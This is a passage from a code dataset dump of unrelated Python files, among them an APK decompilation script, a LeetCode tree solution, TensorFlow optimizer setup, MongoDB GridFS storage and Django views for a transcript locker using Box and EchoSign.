move\n\ndef decompilation(filename):\n# function of decompilation\n apktool_command = \"apktool.jar d \" + filename\n os.system(apktool_command)\n\ndef mkdirs(path):\n# function of make a dir\n path=path.strip()\n path=path.rstrip(\"\\\\\")\n isExists=os.path.exists(path)\n if not isExists:\n os.makedirs(path)\n return True\n else:\n return False\n# Decomplication of Apk file\nif __name__ == '__main__':\n path = './InputApk/'\n for root,dirs,files in os.walk(path):\n for file in files:\n apkname = os.path.join(root, file)\n if apkname.endswith('.apk'):\n decompilation(apkname)\n# Creating folders with smali files\n# Moving smali files to corresponding folders\n for root, dirs, files in os.walk('./'):\n for file in files:\n if file.endswith('.smali'):\n smaliname=os.path.split(file)[1]\n smalifile=os.path.dirname(os.path.join(root,file))\n foldername=smalifile.split('smali')\n smalidir='./BytecodeFiles/'+foldername[0]+foldername[1].replace('\\\\','.')\n mkdirs(smalidir)\n move(smalifile+'\\\\'+smaliname,smalidir+'\\\\'+smaliname)\n","sub_path":"Apk2bytecode.py","file_name":"Apk2bytecode.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"540459054","text":"# coding=utf-8\n#\n# @lc app=leetcode id=236 lang=python\n#\n# [236] Lowest Common Ancestor of a Binary Tree\n#\n# https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-tree/description/\n#\n# algorithms\n# Medium (38.83%)\n# Likes: 2223\n# Dislikes: 143\n# Total Accepted: 310.1K\n# Total Submissions: 795.5K\n# Testcase Example: '[3,5,1,6,2,0,8,null,null,7,4]\\n5\\n1'\n#\n# Given a binary tree, find the lowest common ancestor (LCA) of two given nodes\n# in the tree.\n# \n# According to the definition of LCA on Wikipedia: “The lowest common ancestor\n# is defined between two nodes p and q as the lowest node in T that has both p\n# and q as descendants (where we allow a node to be a descendant of itself).”\n# \n# Given the following binary tree:  root = [3,5,1,6,2,0,8,null,null,7,4]\n# \n# \n# \n# Example 1:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1\n# Output: 3\n# Explanation: The LCA of nodes 5 and 1 is 3.\n# \n# \n# Example 2:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4\n# Output: 5\n# Explanation: The LCA of nodes 5 and 4 is 5, since a node can be a descendant\n# of itself according to the LCA definition.\n# \n# \n# \n# \n# Note:\n# \n# \n# All of the nodes' values will be unique.\n# p and q are different and both values will exist in the binary tree.\n# \n# \n#\n# Definition for a binary tree node.\n\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n # 必须没有重复的出现\n self.father = None\n self.getNodeDepth(root, p, q)\n return self.father\n\n def getNodeDepth(self, root, p, q):\n if not root:\n return\n one = root.val in [p.val, q.val]\n left = self.getNodeDepth(root.left, p, q)\n right = self.getNodeDepth(root.right, p, q)\n if (one and left) or (one and right) or (left and right):\n self.father = root\n return one or left or right\n\n\n# if __name__ == '__main__':\n# s = Solution()\n# head = TreeNode(3)\n# head.left = TreeNode(5)\n# head.right = TreeNode(1)\n# head.left.left = TreeNode(6)\n# head.left.right = TreeNode(2)\n# head.left.right.left = TreeNode(7)\n# head.left.right.right = TreeNode(4)\n# head.right.left = TreeNode(0)\n# head.right.right = TreeNode(8)\n# print s.lowestCommonAncestor(head, 5, 1)\n","sub_path":"236.lowest-common-ancestor-of-a-binary-tree.py","file_name":"236.lowest-common-ancestor-of-a-binary-tree.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"356219002","text":"from datetime import datetime\nfrom flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\n\nclass Todo(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n task = db.Column(db.Text)\n done = db.Column(db.Boolean)\n date = db.Column(db.DateTime)\n\n def __init__(self, task, done):\n self.task = task\n self.done = done\n self.date = datetime.utcnow()","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"272126350","text":"#!/usr/bin/env python\n\n__author__ = 'meatz'\n\nimport numpy as np\n\n\nimport csv\nimport gzip\nimport sys\nimport time\nimport os\nimport re\nimport json\nimport time\nimport calendar\nimport datetime\nfrom collections import defaultdict\nfrom collections import Counter\nimport fnmatch\n\n\n# add ecmwf_utils to python path\nutil_path = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\nprint (util_path)\nsys.path.append(util_path)\n\nfrom ecmwf_util import Statistics\n\ndef prettyfy(number):\n d = float(number)\n if d - int(d) > 0:\n return '{:,.2f}'.format(d)\n return '{:,d}'.format(int(d))\n\nresults = {}\n\ntapes_counter = Counter()\n\nresults[\"total_counted_requests\"] = 0\nresults[\"total_requests_with_fdb\"] = 0\nresults[\"total_requests_with_tape\"] = 0\nresults[\"total_requests_with_disk\"] = 0\n\nresults[\"total_requests_with_fdb_only\"] = 0\nresults[\"total_requests_with_tape_only\"] = 0\nresults[\"total_requests_with_disk_only\"] = 0\n\nexectimes_with_tape = Counter()\nexectimes_no_tape = Counter()\n\ndef dump(todo_list_retrieves):\n TS = 0\n FIELDS = 1 \n FIELDS_ONLINE = 2\n FIELDS_OFFLINE = 3\n BYTES = 4\n BYTES_ONLINE = 5\n BYTES_OFFLINE = 6\n TAPES = 7\n TAPE_FILES = 8\n EXEC_TIME = 9\n DATABASE = 10\n\n\n retrieves_files_read_cnt = 0\n for sf in source_files:\n retrieves_files_read_cnt += 1\n\n # if retrieves_files_read_cnt == 3:\n # return\n with gzip.open(sf, 'rt') as csv_file:\n reader = csv.reader(csv_file, delimiter=';')\n next(reader) # skip header\n \n for row in reader:\n fields = int(row[FIELDS]) + int(row[FIELDS_ONLINE]) + int(row[FIELDS_OFFLINE])\n \n bytes = int(row[BYTES])\n bytes_online = int(row[BYTES_ONLINE])\n bytes_offline = int(row[BYTES_OFFLINE])\n\n tapes = int(row[TAPES])\n exec_time = int(row[EXEC_TIME])\n\n if bytes > 0:\n if bytes > (1024 * 1024 * 1024 * 1024) :\n print (\"skipping line: %s\" % row)\n pass\n else:\n results[\"total_counted_requests\"] += 1\n tapes_counter[tapes] += 1\n\n if bytes > 0 and (bytes_online + bytes_offline) != bytes:\n results[\"total_requests_with_fdb\"] += 1\n if bytes_online > 0:\n results[\"total_requests_with_disk\"] += 1\n if bytes_offline > 0:\n results[\"total_requests_with_tape\"] += 1\n \n if bytes > 0 and bytes_online == 0 and bytes_offline == 0:\n results[\"total_requests_with_fdb_only\"] += 1\n \n if bytes > 0 and bytes_online == bytes and bytes_offline == 0:\n results[\"total_requests_with_disk_only\"] += 1\n\n if bytes > 0 and bytes_online == 0 and bytes_offline == bytes:\n results[\"total_requests_with_tape_only\"] += 1\n\n if tapes > 0:\n exectimes_with_tape[exec_time] += 1\n else:\n exectimes_no_tape[exec_time] += 1\n\n\n print(\"%s finished reading retrieves_file: %d : %s\" % (datetime.datetime.now(), retrieves_files_read_cnt, sf))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print (\"usage: /path/to/*retrieves.csv.gz\")\n sys.exit(1)\n\n source_dir = os.path.abspath(sys.argv[1])\n\n source_files = [os.path.join(dirpath, f)\n for dirpath, dirnames, files in os.walk(source_dir)\n for f in fnmatch.filter(files, '*.retrieves.csv.gz')]\n\n\n dump(source_files)\n\n results[\"fraction_of_requests_with_tape_percent\"] = prettyfy(float(results[\"total_requests_with_tape\"]) / results[\"total_counted_requests\"] * 100)\n\n\n er = {}\n er[\"with_tape\"] = {}\n er[\"no_tape\"] = {}\n er[\"tapes_counter\"] = {}\n\n\n elems = list(exectimes_no_tape.elements())\n er[\"no_tape\"][\"P05\"] = prettyfy(Statistics.percentile(elems, 0.05))\n er[\"no_tape\"][\"P25\"] = prettyfy(Statistics.percentile(elems, 0.25))\n er[\"no_tape\"][\"P50\"] = prettyfy(Statistics.percentile(elems, 0.50))\n er[\"no_tape\"][\"P95\"] = prettyfy(Statistics.percentile(elems, 0.95))\n er[\"no_tape\"][\"P99\"] = prettyfy(Statistics.percentile(elems, 0.99))\n er[\"no_tape\"][\"mean\"] = Statistics.get_meanconf_string(elems)\n\n elems = list(exectimes_with_tape.elements())\n er[\"with_tape\"][\"P05\"] = prettyfy(Statistics.percentile(elems, 0.05))\n er[\"with_tape\"][\"P25\"] = prettyfy(Statistics.percentile(elems, 0.25))\n er[\"with_tape\"][\"P50\"] = prettyfy(Statistics.percentile(elems, 0.50))\n er[\"with_tape\"][\"P95\"] = prettyfy(Statistics.percentile(elems, 0.95))\n er[\"with_tape\"][\"P99\"] = prettyfy(Statistics.percentile(elems, 0.99))\n er[\"with_tape\"][\"mean\"] = Statistics.get_meanconf_string(elems)\n \n tapes_counter\n elems = list(tapes_counter.elements())\n er[\"tapes_counter\"][\"P05\"] = prettyfy(Statistics.percentile(elems, 0.05))\n er[\"tapes_counter\"][\"P25\"] = prettyfy(Statistics.percentile(elems, 0.25))\n er[\"tapes_counter\"][\"P50\"] = prettyfy(Statistics.percentile(elems, 0.50))\n er[\"tapes_counter\"][\"P95\"] = prettyfy(Statistics.percentile(elems, 0.95))\n er[\"tapes_counter\"][\"P99\"] = prettyfy(Statistics.percentile(elems, 0.99))\n er[\"tapes_counter\"][\"mean\"] = Statistics.get_meanconf_string(elems)\n \n results[\"tape_exectimes\"] = er\n\n print (json.dumps(results, indent=2))","sub_path":"mars_feedback/feedback/analyze_requests.py","file_name":"analyze_requests.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"224798377","text":"from bs4 import BeautifulSoup\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.common.exceptions import NoSuchElementException\nimport datetimehandler\n\n\nopts = Options()\nopts.set_headless()\n\nassert opts.set_headless\nbrowser = Firefox(options=opts)\n\ntarget_url = 'http://www.elkhabar.com/press/article/2/'\nbrowser.get(target_url)\n\ntry:\n print(\"---entering try---\")\n err404 = browser.find_element_by_xpath('/html/body/div/center/div/div[2]/h2')\n page404_cnt += 1\n print(\"404 found: i = \",i)\n \nexcept NoSuchElementException:\n # page exists, proceed with code\n\n page = browser.page_source\n soup = BeautifulSoup(page, 'lxml')\n\n title_box = soup.find('h2', attrs={'id': 'article_title'})\n date_box = soup.find('time', attrs={'class': 'relative_time'}).get('datetime')\n article_box = soup.find('div', attrs={'id': 'article_body_content'})\n\n title = title_box.text.strip()\n date = date_box.text.strip()\n article = article_box.text.strip()\n\n print(datetimehandler.convertRSSdate(date))\n print(title)\n","sub_path":"YaleBigData/test/grabDateWithGet.py","file_name":"grabDateWithGet.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"89697854","text":"'''\nCreated on 2013-8-6\nclass mongoInsert\n@author: tree\n'''\n__metaclass__ = type\n\nimport os\nfrom pymongo.database import Database\nimport time\nimport gridfs\nimport StringIO\nclass mongoImg(object):\n \"\"\"mongoInsert is a class for inserting document\n \n \n \"\"\"\n def __init__(self, database, dir=None):\n \"\"\"Create a new instance of :class:mongoInsert\n :Parameters:\n - `database`: database to use\n - `dir` : directory of document \n \"\"\"\n if not isinstance(database, Database):\n raise TypeError(\"database must be an instance of Database\")\n\n \n# self.__con = Connection()\n self.__imgdb = database\n self.__imgfs = gridfs.GridFS (self.__imgdb)\n self.__dir = dir\n self.__filelist=[]\n\n #save filepath in list.txt\n def __dirwalk(self,topdown=True):\n \"\"\"traverse the documents of self.__dir and save in self.__filelist\n \"\"\"\n sum=0\n self.__filelist.clear()\n \n for root,dirs,files in os.walk(self.__dir,topdown):\n for name in files:\n sum+=1\n temp=os.path.join(root,name)\n self.__filelist.append(temp)\n print(sum)\n\n #insert image \n def insert(self):\n \"\"\"insert images in mongodb\n \"\"\"\n self.__dirwalk()\n\n tStart = time.time() \n for fi in self.__filelist: \n with open (fi,'rb') as myimage:\n data=myimage.read() \n self.__imgfs.put(data, content_type = \"jpg\", filename =fi)\n \n tEnd =time.time ()\n print (\"It cost %f sec\" % (tEnd - tStart))\n \n #get image by filename\n def getbyname(self,filename,prefix=''):\n \"\"\"get img from mongdb by filename\n \"\"\"\n \n dataout=self.__imgfs.get_version(filename,**{'prefix':prefix})\n imgout = StringIO.StringIO()\n try:\n #imgout=open(savepath,'wb')\n data=dataout.read()\n imgout.write(data)\n \n\n finally:\n pass\n return imgout\nif __name__=='__main__':\n #db = MongoClient().gridfs_example\n #fs = GridFS(db)\n #file=open('/home/mujun/image/psb.jpeg')\n alias=GridFs.connection() \n \n mi=mongoImg(GridFs._dbs[alias])\n \n mi.getbyname('/')\n #save(file, 'partner.jpg')\n #a = fs.put(file,filename=\"partner\")\n #print fs.get(a).filename\n \n \n#http://www.cnblogs.com/bigbigtree/archive/2013/08/07/3242483.html\n","sub_path":"core/mongoop.py","file_name":"mongoop.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"414548290","text":"# -*- coding: utf-8 -*-\n\"\"\" \n Author: Kai JIN\n Updated: 2017-03-16\n\"\"\"\nimport tensorflow as tf\nfrom core.utils.logger import logger\n\n\ndef configure_optimizer(config, learning_rate):\n \"\"\"Configures the optimizer used for training.\n Args:\n config: config.train.optimizer\n learning_rate: A scalar or `Tensor` learning rate.\n Returns:\n An instance of an optimizer.\n Raises:\n ValueError: if opt.optimizer is not recognized.\n \"\"\"\n logger.info('Routine will use %s optimizer.' % config.name)\n\n if config.name == 'adadelta':\n optimizer = tf.train.AdadeltaOptimizer(\n learning_rate,\n rho=config.rho,\n epsilon=config.epsilon)\n\n elif config.name == 'adagrad':\n optimizer = tf.train.AdagradOptimizer(\n learning_rate,\n initial_accumulator_value=config.initial_accumulator_value)\n\n elif config.name == 'adam':\n optimizer = tf.train.AdamOptimizer(\n learning_rate,\n beta1=config.beta1,\n beta2=config.beta2,\n epsilon=config.epsilon)\n\n elif config.name == 'ftrl':\n optimizer = tf.train.FtrlOptimizer(\n learning_rate,\n learning_rate_power=config.learning_rate_power,\n initial_accumulator_value=config.initial_accumulator_value,\n l1_regularization_strength=config.l1,\n l2_regularization_strength=config.l2)\n\n elif config.name == 'momentum':\n optimizer = tf.train.MomentumOptimizer(\n learning_rate,\n momentum=config.momentum,\n name='Momentum')\n\n elif config.name == 'rmsprop':\n optimizer = tf.train.RMSPropOptimizer(\n learning_rate,\n decay=config.decay,\n momentum=config.momentum,\n epsilon=config.epsilon)\n\n elif config.name == 'proximal':\n optimizer = tf.train.ProximalGradientDescentOptimizer(\n learning_rate,\n l1_regularization_strength=config.l1_regularization_strength,\n l2_regularization_strength=config.l2_regularization_strength)\n\n elif config.name == 'proximal_adagrad':\n optimizer = tf.train.ProximalAdagradOptimizer(\n learning_rate,\n initial_accumulator_value=config.initial_accumulator_value,\n l1_regularization_strength=config.l1_regularization_strength,\n l2_regularization_strength=config.l2_regularization_strength)\n\n elif config.name == 'sgd':\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n\n else:\n raise ValueError('Optimizer [%s] was not recognized' % config.name)\n\n return optimizer\n","sub_path":"core/solver/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"353347140","text":"\"\"\"Tests for nexus reading -- Maddison et al example\"\"\"\nimport os\nimport unittest\nfrom nexus import NexusReader\n\nEXAMPLE_DIR = os.path.join(os.path.dirname(__file__), '../examples')\n\nclass Test_Maddison_et_al_Spec(unittest.TestCase):\n expected = {\n 'fish': [_ for _ in 'ACATAGAGGGTACCTCTAAG'],\n 'frog': [_ for _ in 'ACTTAGAGGCTACCTCTACG'],\n 'snake': [_ for _ in 'ACTCACTGGGTACCTTTGCG'],\n 'mouse': [_ for _ in 'ACTCAGACGGTACCTTTGCG'],\n }\n \n def setUp(self):\n self.nex = NexusReader(os.path.join(EXAMPLE_DIR, 'maddison_et_al.nex'))\n \n def test_taxa(self):\n assert 'taxa' in self.nex.blocks\n for taxon in self.expected:\n assert taxon in self.nex.blocks['taxa'].taxa\n assert self.nex.blocks['taxa'].ntaxa == len(self.expected)\n \n def test_characters(self):\n assert 'characters' in self.nex.blocks\n assert self.nex.blocks['characters'].nchar == 20\n assert self.nex.blocks['characters'].ntaxa == 4\n assert self.nex.blocks['characters'].format['datatype'] == 'dna'\n for taxon in self.expected:\n assert taxon in self.nex.blocks['characters'].matrix\n assert self.nex.blocks['characters'].matrix[taxon] == self.expected[taxon]\n \n def test_data(self): # characters is linked to `data`\n assert self.nex.blocks['data'] == self.nex.blocks['characters']\n \n def test_trees(self):\n assert 'trees' in self.nex.blocks\n assert self.nex.blocks['trees'].ntrees == 1\n","sub_path":"nexus/test/test_maddison.py","file_name":"test_maddison.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"236582185","text":"#!/usr/bin/env python\nDESC = \"\"\"\nJSON-pretty-printer: \nConverts (raw) json data on stdin and outputs pretty formatted json to stdout\n\"\"\"\n\nimport sys\nimport json\nimport argparse\n\ndef json_pprint(unformated_json, amount_of_indentation):\n \"\"\" Turns raw json into formated json \"\"\"\n parsed = json.loads(unformated_json)\n output = json.dumps(parsed, indent=amount_of_indentation, sort_keys=True)\n return output\n\ndef parse_arguments():\n \"\"\" Parses terminal arguments or returns default values \"\"\"\n arg_obj = argparse.ArgumentParser(description=DESC)\n arg_obj.add_argument( '--indent',\n dest=\"indent\", \n type=int,\n nargs='?',\n default=4,\n help='Notes the amount of spaces each indentation level should have')\n return arg_obj.parse_args()\n\ndef main():\n \"\"\" main function\n Read and parse the given arguments.\n Read the input.\n transform the json\n print the reformated json\n \"\"\"\n arguments = parse_arguments()\n data = \"\"\n for line in sys.stdin:\n data += line\n transformed = json_pprint(data, arguments.indent)\n print(transformed)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"json_pprint.py","file_name":"json_pprint.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"426798963","text":"import os, subprocess, re, string, sys, django, json, uuid, base64\nimport urllib, requests, datetime, shutil\nfrom io import StringIO\n\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.conf import settings\nfrom mylocker.common import get_emplid, get_sunetid, get_display_name, \\\n get_provider,get_extemail\nfrom django.contrib import messages\nfrom locker.models import BackendProvider, LockerEntry, LockerUser, \\\n DocumentSigningProvider\nfrom django.core.mail import EmailMessage\n\nEMAIL_SUBJECT = 'Stanford University Electronic Credential'\nEMAIL_BODY = 'Dear {Recipient\\'s name},\\n\\\n\\n\\\nYou are receiving this certified electronic credential from the Stanford University Registrar\\'s Office on behalf of {users_name}. This electronic document is a certified PDF and is best viewed and validated using the free Adobe Reader (v8.0 or greater). To download the free Adobe Reader, please go here: https://get.adobe.com/reader/\\n\\\n\\n\\\nView the second page of the electronic credential for further instructions on how to validate the authenticity of the document.\\n\\\n\\n\\\nBest Regards,\\n\\\n{users_name}'\n\ndef index(request):\n # SCPD users have XNUMBERS, Stanford users have EMPLIDs.\n # We must issue different queries for these two groups.\n if get_extemail(request) :\n user_email = get_extemail(request)\n LockerUser.objects.get_or_create(sunetid=user_email)\n locker_entries = LockerEntry.objects.filter(owner_email=user_email)\\\n .prefetch_related('backend_entity__lockerentrysenddocs_set').all()\n else:\n if get_provider(request) == 'SCPD':\n user_xnumber = get_emplid(request)\n locker_entries = LockerEntry.objects.filter(owner_xnumber=user_xnumber)\\\n .prefetch_related('backend_entity__lockerentrysenddocs_set').all()\n else:\n user_emplid = get_emplid(request)\n LockerUser.objects.get_or_create(sunetid=get_sunetid(request))\n locker_entries = LockerEntry.objects.filter(owner_emplid=user_emplid)\\\n .prefetch_related('backend_entity__lockerentrysenddocs_set').all()\n context = {\n 'locker_entries': locker_entries,\n 'email_subject': EMAIL_SUBJECT,\n 'email_body': preprocess_email_body(request),\n }\n return render(request, 'locker/index.html', context)\n\ndef retrieve_signed_pdf_bytes(locker_entry):\n BOX_AUTH_HEADERS = {\n 'Authorization': 'Bearer ' \\\n + BackendProvider.objects.get().access_token\n }\n backend_resp = requests.get(\n \"https://www.box.com/api/2.0/files/\" + locker_entry.backend_entity.entity_id + \"/content\",\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB, headers=BOX_AUTH_HEADERS, stream=True)\n if backend_resp.status_code != requests.codes.ok:\n raise Exception(\"Backend response status code is not 200; value is: \" \\\n + backend_resp.status_code)\n pdf_raw_bytes = backend_resp.raw.data[:]\n if not locker_entry.backend_entity.is_signed:\n # Sign document with Adobe EchoSign.\n backend_resp = sign_document_with_echosign(pdf_raw_bytes)\n if backend_resp.status_code != requests.codes.ok:\n raise Exception('EchoSign response status code is ' + str(backend_resp.status_code))\n pdf_raw_bytes = backend_resp.raw.data\n # Overwrite the backend file with its signed equivalent.\n replace_resp = replace_backend_document(locker_entry.backend_entity.entity_id, pdf_raw_bytes)\n if replace_resp.status_code != requests.codes.created:\n raise Exception('Box replacement response status code is ' + str(replace_resp.status_code))\n # Mark the entity as signed so we don't have to do this again.\n locker_entry.backend_entity.is_signed = True;\n locker_entry.backend_entity.save()\n return pdf_raw_bytes\n\ndef replace_backend_document(entity_id, pdf_raw_bytes):\n BOX_AUTH_HEADERS = {\n 'Authorization': 'Bearer ' \\\n + BackendProvider.objects.get().access_token\n }\n return requests.post('https://upload.box.com/api/2.0/files/' + entity_id + '/content',\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB,\n headers=BOX_AUTH_HEADERS,\n files={'file' : pdf_raw_bytes})\n\ndef sign_document_with_echosign(pdf_raw_bytes):\n ECHOSIGN_AUTH_HEADERS = {'Access-Token': DocumentSigningProvider.objects.get().access_token}\n uuid4 = str(uuid.uuid4())\n\n # POST the document as a transient document to EchoSign. We don't care about\n # the filename, so simply give it a UUID4.\n es_upload_resp = requests.post('https://api.na1.echosign.com/api/rest/v5/transientDocuments',\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB,\n headers=ECHOSIGN_AUTH_HEADERS,\n files={'File': pdf_raw_bytes, 'Mime-Type': 'application/pdf', 'File-Name': uuid4 + '.pdf'})\n transient_doc_id = es_upload_resp.json()['transientDocumentId']\n\n # Create an agreement using the transient document.\n es_agmt_create_resp = requests.post('https://api.na1.echosign.com:443/api/rest/v5/agreements',\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB,\n headers=dict(ECHOSIGN_AUTH_HEADERS.items() + {'Content-Type': 'application/json'}.items()),\n data='{\"documentCreationInfo\":{\"signatureType\":\"ESIGN\",\"recipientSetInfos\":[{\"recipientSetMemberInfos\":[{\"email\":\"locker@stanford.edu\"}],\"recipientSetRole\":\"APPROVER\"}],\"signatureFlow\":\"SENDER_SIGNATURE_NOT_REQUIRED\",\"fileInfos\":[{\"transientDocumentId\":\"'+transient_doc_id+'\"}],\"name\":\"MyLocker_'+uuid4+'\"}}')\n agreement_id = es_agmt_create_resp.json()['agreementId']\n\n # Get the document ID as it pertains to the agreement.\n es_agmt_docs_resp = requests.get('https://api.na1.echosign.com:443/api/rest/v5/agreements/' \\\n + agreement_id + '/documents',\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB,\n headers=ECHOSIGN_AUTH_HEADERS)\n agmt_doc_id = es_agmt_docs_resp.json()['documents'][0]['documentId']\n\n # Get the document in the agreement, which is now signed by Adobe.\n es_doc_resp = requests.get('https://api.na1.echosign.com:443/api/rest/v5/agreements/' \\\n + agreement_id + '/documents/' + agmt_doc_id,\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB,\n headers=ECHOSIGN_AUTH_HEADERS, stream=True)\n return es_doc_resp\n\ndef download_old(request, entry_id):\n if get_provider(request) == 'SCPD':\n locker_entry = get_object_or_404(LockerEntry, owner_xnumber=get_emplid(request), id=entry_id)\n else:\n locker_entry = get_object_or_404(LockerEntry, owner_emplid=get_emplid(request), id=entry_id)\n locker_entry.create_download_audit_record(request)\n try:\n pdf_raw_bytes = retrieve_signed_pdf_bytes(locker_entry)\n response = HttpResponse(pdf_raw_bytes, content_type='application/pdf')\n response['Content-Disposition'] = \\\n 'attachment; filename=\"' + locker_entry.label_line1 + '.pdf\"'\n return response\n except Exception as ex:\n messages.error(request, 'An unexpected error occurred while retrieving your document: ' + str(ex))\n return redirect(reverse('locker:index'))\n\ndef retrieve_pdf_from_box(backend_entity_id):\n BOX_AUTH_HEADERS = {\n 'Authorization': 'Bearer ' \\\n + BackendProvider.objects.get().access_token\n }\n return requests.get(\n \"https://www.box.com/api/2.0/files/\" + backend_entity_id + \"/content\",\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB, headers=BOX_AUTH_HEADERS, stream=True)\n\ndef download(request, entry_id):\n if get_extemail(request) :\n locker_entry = get_object_or_404(LockerEntry, owner_email=get_extemail(request), id=entry_id)\n else:\n if get_provider(request) == 'SCPD':\n locker_entry = get_object_or_404(LockerEntry, owner_xnumber=get_emplid(request), id=entry_id)\n else:\n locker_entry = get_object_or_404(LockerEntry, owner_emplid=get_emplid(request), id=entry_id)\n locker_entry.create_download_audit_record(request)\n try:\n backend_resp = retrieve_pdf_from_box(locker_entry.backend_entity.entity_id)\n if backend_resp.status_code != requests.codes.ok:\n raise Exception(\"Backend response status code is not 200; value is: \" \\\n + backend_resp.status_code)\n except Exception as ex:\n messages.error(request, 'An unexpected error prevented the download of your document.')\n return redirect(reverse('locker:index'))\n\n response = HttpResponse(\n backend_resp, content_type='application/pdf')\n response['Content-Disposition'] = \\\n 'attachment; filename=\"' + locker_entry.label_line1 \\\n + '.pdf\"'\n return response\n\ndef send_document_old(request):\n if request.method == 'POST':\n entry_id=request.POST['entry_id'] \n if get_provider(request) == 'SCPD':\n locker_entry = get_object_or_404(LockerEntry, owner_xnumber=get_emplid(request), id=entry_id)\n else:\n locker_entry = get_object_or_404(LockerEntry, owner_emplid=get_emplid(request), id=entry_id)\n try:\n pdf_raw_bytes = retrieve_signed_pdf_bytes(locker_entry)\n\n # Prepare the email to be sent.\n subject = EMAIL_SUBJECT\n recipient_name=request.POST['recipient_name']\n to_email_addrs=request.POST['to_email_addrs']\n from_email = 'registrar@stanford.edu'\n body = preprocess_email_body(request, recipient_name)\n\n # Create message, attach document, and create audit record.\n email_msg = EmailMessage(subject, body, from_email, to_email_addrs.split(','))\n email_msg.attach(locker_entry.label_line1 + '.pdf', pdf_raw_bytes, 'application/pdf')\n locker_entry.create_send_audit_record(request, subject, body, from_email, to_email_addrs)\n\n # Send the message.\n email_msg.send(fail_silently=False)\n \n messages.success(request, 'Document sent successfully.')\n except Exception as e:\n messages.error(request, 'An error prevented your document from being sent.')\n else:\n messages.error(request, 'You must POST the appropriate data to this route; GET is not supported.')\n return redirect(reverse('locker:index'))\n \ndef send_document(request):\n if request.method == 'POST':\n entry_id=request.POST['entry_id'] \n if get_extemail(request) :\n locker_entry = get_object_or_404(LockerEntry, owner_email=get_extemail(request), id=entry_id)\n else:\n if get_provider(request) == 'SCPD':\n locker_entry = get_object_or_404(LockerEntry, owner_xnumber=get_emplid(request), id=entry_id)\n else:\n locker_entry = get_object_or_404(LockerEntry, owner_emplid=get_emplid(request), id=entry_id)\n try:\n # Get the raw PDF from the response from Box.\n backend_resp = retrieve_pdf_from_box(locker_entry.backend_entity.entity_id)\n pdf_raw_data = StringIO.StringIO()\n shutil.copyfileobj(backend_resp.raw, pdf_raw_data)\n\n # Prepare the email to be sent.\n subject = EMAIL_SUBJECT\n recipient_name=request.POST['recipient_name']\n to_email_addrs=request.POST['to_email_addrs']\n from_email = 'registrar@stanford.edu'\n body = preprocess_email_body(request, recipient_name)\n\n # Create message, attach document, and create audit record.\n email_msg = EmailMessage(subject, body, from_email, to_email_addrs.split(','))\n email_msg.attach(locker_entry.label_line1 + '.pdf', pdf_raw_data.getvalue(), 'application/pdf')\n locker_entry.create_send_audit_record(request, subject, body, from_email, to_email_addrs)\n\n # Send the message.\n email_msg.send(fail_silently=False)\n \n messages.success(request, 'Document sent successfully.')\n except Exception as e:\n messages.error(request, 'An error prevented your document from being sent.')\n else:\n messages.error(request, 'You must POST the appropriate data to this route; GET is not supported.')\n return redirect(reverse('locker:index'))\n\ndef preprocess_email_body(request, recipient_name='{Recipient\\'s name}'):\n return EMAIL_BODY\\\n .replace('{users_name}', get_display_name(request))\\\n .replace('{Recipient\\'s name}', recipient_name)\n","sub_path":"Mylocker-Upgrade-master/mylocker/locker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"64822014","text":"import re\n\n\ndef parse(content, template):\n \"\"\"解析配置文件\n :param content: 输入的解析文件\n :param template: 输入的匹配规则\n :return: 要返回的字段列表,以及数据\n \"\"\"\n content = re.sub(\"[\\f\\r\\t\\v]*\", \"\", content)\n # 以!或则#分段,生成数组\n pattern = re.compile('^[!#]', re.M)\n group = re.split(pattern, content)\n\n # 